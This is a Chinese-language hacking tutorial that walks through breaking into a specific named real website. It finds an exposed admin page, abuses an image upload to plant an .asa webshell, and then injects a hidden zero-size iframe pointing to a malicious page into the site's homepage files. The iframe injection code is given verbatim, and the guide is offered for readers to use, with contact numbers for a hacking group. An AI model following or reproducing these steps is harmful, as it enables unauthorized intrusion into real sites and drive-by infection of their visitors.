各位看客们.大家好!

我是Night Fox

这次给大家带来的是从网站入侵到网站挂马的教程~~

也是应一些朋友们要求做的~~~~

目标:
http://www.yhsun.com/

费话不说啦~~~

我的习惯是先猜默认的地址是否存在...

郁闷~~竟然还开了目录浏览....我们使用快捷键ctrl+f找下有没有login.asp文件

......郁闷.....

http://www.yhsun.com/admin/Login.asp.bak

再试试admin

管理选项：分类管理 | 增加产品| 管理产品 |

增加产品

试试这个.有传图片的地方...我们点大图后面的上传图片按钮....

图片上传成功,[返回继续上传]
图片是：缩略图      放大图

复制下upload/2006541552288032.asa

点下当前窗口然后使用ctrl+n打开一个新窗口

http://www.yhsun.com/desk03/upload/2006541552288032.asa

Night Fox 专用版
这个马马上传去

现在我们找他的首页

要挂马就得找到网站首页文件~~~~

默认的网站首页一般有:

index.html index.htm index.asp
 
default.htm default.asp default.aspx

这个网站首页是有两个首页文件....

为了不漏掉.我们就给这两个文件都加上挂马代码吧!

如果你不熟悉代码的话.我建议你加到网页的最下方....

挂马的代码为
<iframe src="你的网马地址" width="0" height="0" scrolling="no" frameborder="0"></iframe>

大家进去了不要搞破坏啊~~~这个服务器安全设置的真差啊~~~~~

点"站点根目录" 使用搜索键搜索.向这种站点根目录很少的文件就不需要使用搜索键啦

文件保存成功！

还有啊~~~~~我的原则是不刷QB.不挂马的.所以请不要来问我这些问题!~~~~~~

这次的挂马教程也是为了一些网友的要求才做的!~~

交流群:9461865.感谢热心网友提供~~~~~

我的主号:QQ:8992598(网页设计专用)

黑客专用号:399517853(黑客技术交流的朋友加这个号)

教程结束.886